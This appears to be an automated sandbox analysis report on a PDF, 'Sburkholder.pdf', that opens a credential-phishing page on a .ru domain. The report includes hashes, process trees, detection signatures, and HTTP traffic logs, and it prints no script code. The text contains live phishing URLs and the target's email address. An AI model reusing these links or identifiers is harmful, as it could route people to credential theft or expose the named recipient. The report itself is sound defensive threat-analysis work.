Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Sburkholder.pdf

Overview

General Information

Sample name:Sburkholder.pdf
Analysis ID:1585620
MD5:b3a3d7744a0c02cd48e73ce53e940cae
SHA1:16c7c792a7f9d6e762bbd889b1ce4a8f1c78177a
SHA256:e38743b9f792a39181c5549336760d980af96a3534a782db872948e97a21651e
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • Acrobat.exe (PID: 6896 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Sburkholder.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 7112 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 6164 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1556 --field-trial-handle=1496,i,10005414482586613621,10229627965643939446,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 7596 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sung.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.com MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7780 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2004,i,17975387101299091926,15807436592221751878,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://sung.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.comSlashNext: Label: Credential Stealing type: Phishing & Social Engineering
Source: https://sung.ethamoskag.ru/favicon.icoAvira URL Cloud: Label: malware
Source: https://sung.ethamoskag.ru/0cUrcw3/Avira URL Cloud: Label: malware

Phishing

barindex
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://sung.ethamoskag.ru/0cUrcw3/#Msburkholder@h... This script exhibits several high-risk behaviors, including disabling common developer tools and keyboard shortcuts, as well as redirecting the user to a suspicious domain (login.microsoftonline.com) after a delay. The script appears to be attempting to prevent analysis and detection, which is a strong indicator of malicious intent.
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://sung.ethamoskag.ru/0cUrcw3/#Msburkholder@h... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://sung.ethamoskag.ru/0cUrcw3/#Msburkholder@h... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the interaction with untrusted domains further increase the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718825931224384.OTQ5NWIxZWItYzQxNC00MjE0LTgxYWYtYzMyZTg3NWNhOTlmY2EwZjFhZDAtZTlmMC00ZDUyLWFiMDYtM2ZiMmRjZWJjZDVl&ui_locales=en-US&mkt=en-US&client-request-id=f8057c5a-282d-4166-9f5f-3591fe6ae2f0&state=WgDpnDtWNOhxv3ZZ-qEHB-D4Ijm93d9qhRVOmcsWhDnFNV-7_nsFkbtwgTJkrcZ14ERBVmASB34Gb_nZf4UN1hF7WelSUM7xyswZ2vei3RW4EYwIED1Glz16dyp_EDVwaSVh6FPE7NHRtTWvLQUXfJBZ1Pr9mr8ERBx34-z7qKtwfTnoJXchp2-Bd0HvtcRQlN0kXo9ZNVGVdURgzdn2SJiIBGpVipFGpfalr75ftWHDpY8VOH8kVQITQLtf5HONhAHsdo8hJKSLdp9j2IRqbg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718825931224384.OTQ5NWIxZWItYzQxNC00MjE0LTgxYWYtYzMyZTg3NWNhOTlmY2EwZjFhZDAtZTlmMC00ZDUyLWFiMDYtM2ZiMmRjZWJjZDVl&ui_locales=en-US&mkt=en-US&client-request-id=f8057c5a-282d-4166-9f5f-3591fe6ae2f0&state=WgDpnDtWNOhxv3ZZ-qEHB-D4Ijm93d9qhRVOmcsWhDnFNV-7_nsFkbtwgTJkrcZ14ERBVmASB34Gb_nZf4UN1hF7WelSUM7xyswZ2vei3RW4EYwIED1Glz16dyp_EDVwaSVh6FPE7NHRtTWvLQUXfJBZ1Pr9mr8ERBx34-z7qKtwfTnoJXchp2-Bd0HvtcRQlN0kXo9ZNVGVdURgzdn2SJiIBGpVipFGpfalr75ftWHDpY8VOH8kVQITQLtf5HONhAHsdo8hJKSLdp9j2IRqbg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718825931224384.OTQ5NWIxZWItYzQxNC00MjE0LTgxYWYtYzMyZTg3NWNhOTlmY2EwZjFhZDAtZTlmMC00ZDUyLWFiMDYtM2ZiMmRjZWJjZDVl&ui_locales=en-US&mkt=en-US&client-request-id=f8057c5a-282d-4166-9f5f-3591fe6ae2f0&state=WgDpnDtWNOhxv3ZZ-qEHB-D4Ijm93d9qhRVOmcsWhDnFNV-7_nsFkbtwgTJkrcZ14ERBVmASB34Gb_nZf4UN1hF7WelSUM7xyswZ2vei3RW4EYwIED1Glz16dyp_EDVwaSVh6FPE7NHRtTWvLQUXfJBZ1Pr9mr8ERBx34-z7qKtwfTnoJXchp2-Bd0HvtcRQlN0kXo9ZNVGVdURgzdn2SJiIBGpVipFGpfalr75ftWHDpY8VOH8kVQITQLtf5HONhAHsdo8hJKSLdp9j2IRqbg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 9495b1eb-c414-4214-81af-c32e875ca99fca0f1ad0-e9f0-4d52-ab06-3fb2dcebcd5e
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718825931224384.OTQ5NWIxZWItYzQxNC00MjE0LTgxYWYtYzMyZTg3NWNhOTlmY2EwZjFhZDAtZTlmMC00ZDUyLWFiMDYtM2ZiMmRjZWJjZDVl&ui_locales=en-US&mkt=en-US&client-request-id=f8057c5a-282d-4166-9f5f-3591fe6ae2f0&state=WgDpnDtWNOhxv3ZZ-qEHB-D4Ijm93d9qhRVOmcsWhDnFNV-7_nsFkbtwgTJkrcZ14ERBVmASB34Gb_nZf4UN1hF7WelSUM7xyswZ2vei3RW4EYwIED1Glz16dyp_EDVwaSVh6FPE7NHRtTWvLQUXfJBZ1Pr9mr8ERBx34-z7qKtwfTnoJXchp2-Bd0HvtcRQlN0kXo9ZNVGVdURgzdn2SJiIBGpVipFGpfalr75ftWHDpY8VOH8kVQITQLtf5HONhAHsdo8hJKSLdp9j2IRqbg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718825931224384.OTQ5NWIxZWItYzQxNC00MjE0LTgxYWYtYzMyZTg3NWNhOTlmY2EwZjFhZDAtZTlmMC00ZDUyLWFiMDYtM2ZiMmRjZWJjZDVl&ui_locales=en-US&mkt=en-US&client-request-id=f8057c5a-282d-4166-9f5f-3591fe6ae2f0&state=WgDpnDtWNOhxv3ZZ-qEHB-D4Ijm93d9qhRVOmcsWhDnFNV-7_nsFkbtwgTJkrcZ14ERBVmASB34Gb_nZf4UN1hF7WelSUM7xyswZ2vei3RW4EYwIED1Glz16dyp_EDVwaSVh6FPE7NHRtTWvLQUXfJBZ1Pr9mr8ERBx34-z7qKtwfTnoJXchp2-Bd0HvtcRQlN0kXo9ZNVGVdURgzdn2SJiIBGpVipFGpfalr75ftWHDpY8VOH8kVQITQLtf5HONhAHsdo8hJKSLdp9j2IRqbg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718825931224384.OTQ5NWIxZWItYzQxNC00MjE0LTgxYWYtYzMyZTg3NWNhOTlmY2EwZjFhZDAtZTlmMC00ZDUyLWFiMDYtM2ZiMmRjZWJjZDVl&ui_locales=en-US&mkt=en-US&client-request-id=f8057c5a-282d-4166-9f5f-3591fe6ae2f0&state=WgDpnDtWNOhxv3ZZ-qEHB-D4Ijm93d9qhRVOmcsWhDnFNV-7_nsFkbtwgTJkrcZ14ERBVmASB34Gb_nZf4UN1hF7WelSUM7xyswZ2vei3RW4EYwIED1Glz16dyp_EDVwaSVh6FPE7NHRtTWvLQUXfJBZ1Pr9mr8ERBx34-z7qKtwfTnoJXchp2-Bd0HvtcRQlN0kXo9ZNVGVdURgzdn2SJiIBGpVipFGpfalr75ftWHDpY8VOH8kVQITQLtf5HONhAHsdo8hJKSLdp9j2IRqbg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://sung.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.comHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718825931224384.OTQ5NWIxZWItYzQxNC00MjE0LTgxYWYtYzMyZTg3NWNhOTlmY2EwZjFhZDAtZTlmMC00ZDUyLWFiMDYtM2ZiMmRjZWJjZDVl&ui_locales=en-US&mkt=en-US&client-request-id=f8057c5a-282d-4166-9f5f-3591fe6ae2f0&state=WgDpnDtWNOhxv3ZZ-qEHB-D4Ijm93d9qhRVOmcsWhDnFNV-7_nsFkbtwgTJkrcZ14ERBVmASB34Gb_nZf4UN1hF7WelSUM7xyswZ2vei3RW4EYwIED1Glz16dyp_EDVwaSVh6FPE7NHRtTWvLQUXfJBZ1Pr9mr8ERBx34-z7qKtwfTnoJXchp2-Bd0HvtcRQlN0kXo9ZNVGVdURgzdn2SJiIBGpVipFGpfalr75ftWHDpY8VOH8kVQITQLtf5HONhAHsdo8hJKSLdp9j2IRqbg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718825931224384.OTQ5NWIxZWItYzQxNC00MjE0LTgxYWYtYzMyZTg3NWNhOTlmY2EwZjFhZDAtZTlmMC00ZDUyLWFiMDYtM2ZiMmRjZWJjZDVl&ui_locales=en-US&mkt=en-US&client-request-id=f8057c5a-282d-4166-9f5f-3591fe6ae2f0&state=WgDpnDtWNOhxv3ZZ-qEHB-D4Ijm93d9qhRVOmcsWhDnFNV-7_nsFkbtwgTJkrcZ14ERBVmASB34Gb_nZf4UN1hF7WelSUM7xyswZ2vei3RW4EYwIED1Glz16dyp_EDVwaSVh6FPE7NHRtTWvLQUXfJBZ1Pr9mr8ERBx34-z7qKtwfTnoJXchp2-Bd0HvtcRQlN0kXo9ZNVGVdURgzdn2SJiIBGpVipFGpfalr75ftWHDpY8VOH8kVQITQLtf5HONhAHsdo8hJKSLdp9j2IRqbg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718825931224384.OTQ5NWIxZWItYzQxNC00MjE0LTgxYWYtYzMyZTg3NWNhOTlmY2EwZjFhZDAtZTlmMC00ZDUyLWFiMDYtM2ZiMmRjZWJjZDVl&ui_locales=en-US&mkt=en-US&client-request-id=f8057c5a-282d-4166-9f5f-3591fe6ae2f0&state=WgDpnDtWNOhxv3ZZ-qEHB-D4Ijm93d9qhRVOmcsWhDnFNV-7_nsFkbtwgTJkrcZ14ERBVmASB34Gb_nZf4UN1hF7WelSUM7xyswZ2vei3RW4EYwIED1Glz16dyp_EDVwaSVh6FPE7NHRtTWvLQUXfJBZ1Pr9mr8ERBx34-z7qKtwfTnoJXchp2-Bd0HvtcRQlN0kXo9ZNVGVdURgzdn2SJiIBGpVipFGpfalr75ftWHDpY8VOH8kVQITQLtf5HONhAHsdo8hJKSLdp9j2IRqbg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718825931224384.OTQ5NWIxZWItYzQxNC00MjE0LTgxYWYtYzMyZTg3NWNhOTlmY2EwZjFhZDAtZTlmMC00ZDUyLWFiMDYtM2ZiMmRjZWJjZDVl&ui_locales=en-US&mkt=en-US&client-request-id=f8057c5a-282d-4166-9f5f-3591fe6ae2f0&state=WgDpnDtWNOhxv3ZZ-qEHB-D4Ijm93d9qhRVOmcsWhDnFNV-7_nsFkbtwgTJkrcZ14ERBVmASB34Gb_nZf4UN1hF7WelSUM7xyswZ2vei3RW4EYwIED1Glz16dyp_EDVwaSVh6FPE7NHRtTWvLQUXfJBZ1Pr9mr8ERBx34-z7qKtwfTnoJXchp2-Bd0HvtcRQlN0kXo9ZNVGVdURgzdn2SJiIBGpVipFGpfalr75ftWHDpY8VOH8kVQITQLtf5HONhAHsdo8hJKSLdp9j2IRqbg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718825931224384.OTQ5NWIxZWItYzQxNC00MjE0LTgxYWYtYzMyZTg3NWNhOTlmY2EwZjFhZDAtZTlmMC00ZDUyLWFiMDYtM2ZiMmRjZWJjZDVl&ui_locales=en-US&mkt=en-US&client-request-id=f8057c5a-282d-4166-9f5f-3591fe6ae2f0&state=WgDpnDtWNOhxv3ZZ-qEHB-D4Ijm93d9qhRVOmcsWhDnFNV-7_nsFkbtwgTJkrcZ14ERBVmASB34Gb_nZf4UN1hF7WelSUM7xyswZ2vei3RW4EYwIED1Glz16dyp_EDVwaSVh6FPE7NHRtTWvLQUXfJBZ1Pr9mr8ERBx34-z7qKtwfTnoJXchp2-Bd0HvtcRQlN0kXo9ZNVGVdURgzdn2SJiIBGpVipFGpfalr75ftWHDpY8VOH8kVQITQLtf5HONhAHsdo8hJKSLdp9j2IRqbg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718825931224384.OTQ5NWIxZWItYzQxNC00MjE0LTgxYWYtYzMyZTg3NWNhOTlmY2EwZjFhZDAtZTlmMC00ZDUyLWFiMDYtM2ZiMmRjZWJjZDVl&ui_locales=en-US&mkt=en-US&client-request-id=f8057c5a-282d-4166-9f5f-3591fe6ae2f0&state=WgDpnDtWNOhxv3ZZ-qEHB-D4Ijm93d9qhRVOmcsWhDnFNV-7_nsFkbtwgTJkrcZ14ERBVmASB34Gb_nZf4UN1hF7WelSUM7xyswZ2vei3RW4EYwIED1Glz16dyp_EDVwaSVh6FPE7NHRtTWvLQUXfJBZ1Pr9mr8ERBx34-z7qKtwfTnoJXchp2-Bd0HvtcRQlN0kXo9ZNVGVdURgzdn2SJiIBGpVipFGpfalr75ftWHDpY8VOH8kVQITQLtf5HONhAHsdo8hJKSLdp9j2IRqbg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638718825931224384.OTQ5NWIxZWItYzQxNC00MjE0LTgxYWYtYzMyZTg3NWNhOTlmY2EwZjFhZDAtZTlmMC00ZDUyLWFiMDYtM2ZiMmRjZWJjZDVl&ui_locales=en-US&mkt=en-US&client-request-id=f8057c5a-282d-4166-9f5f-3591fe6ae2f0&state=WgDpnDtWNOhxv3ZZ-qEHB-D4Ijm93d9qhRVOmcsWhDnFNV-7_nsFkbtwgTJkrcZ14ERBVmASB34Gb_nZf4UN1hF7WelSUM7xyswZ2vei3RW4EYwIED1Glz16dyp_EDVwaSVh6FPE7NHRtTWvLQUXfJBZ1Pr9mr8ERBx34-z7qKtwfTnoJXchp2-Bd0HvtcRQlN0kXo9ZNVGVdURgzdn2SJiIBGpVipFGpfalr75ftWHDpY8VOH8kVQITQLtf5HONhAHsdo8hJKSLdp9j2IRqbg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 13.107.246.254:443 -> 192.168.2.16:49769 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.254
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.254
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.254
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.254
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.254
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /0cUrcw3/ HTTP/1.1Host: sung.ethamoskag.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sung.ethamoskag.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sung.ethamoskag.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sung.ethamoskag.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sung.ethamoskag.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
